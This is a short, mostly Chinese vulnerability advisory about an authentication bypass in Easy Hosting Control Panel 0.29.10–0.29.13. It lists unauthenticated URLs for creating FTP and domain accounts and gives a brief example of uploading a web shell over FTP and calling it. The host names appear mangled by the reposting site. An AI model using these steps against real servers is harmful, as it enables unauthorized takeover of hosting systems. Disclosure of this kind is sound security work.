标题: Easy Hosting Control Panel Admin Auth Bypass
作者: Jasman HdhCmsTest2cto测试数据
下载 地址: https://launchpad.net/ehcp & http://HdhCmsTestehcp.net
影响版本: 0.29.10 - 0.29.13
测试平台: Ubuntu, Debian
概述
Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
It uses LAMP( Linux ApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional
缺陷:
无需登录可以添加ftp账号和域名
http://HdhCmsTest2cto测试数据 /vhosts/ehcp/?op=applyforaccount
http://HdhCmsTest2cto测试数据 /vhosts/ehcp/?op=applyforftpaccount
http://HdhCmsTest2cto测试数据 /vhosts/ehcp/?op=applyfordomainaccount
示例
upload a shell via ftp
http://HdhCmsTest2cto测试数据 /vhosts/[username]/[domain]/httpdocs/shell.php
测试版本
0.29.13
0.29.11
0.29.10
修复:验证
致谢:
ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng,
aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
Exploit-Id, FeeLcoMz All Indonesian Hacker
查看更多关于Easy Hosting控制面板管理验证绕过缺陷及修复 - 网的详细内容...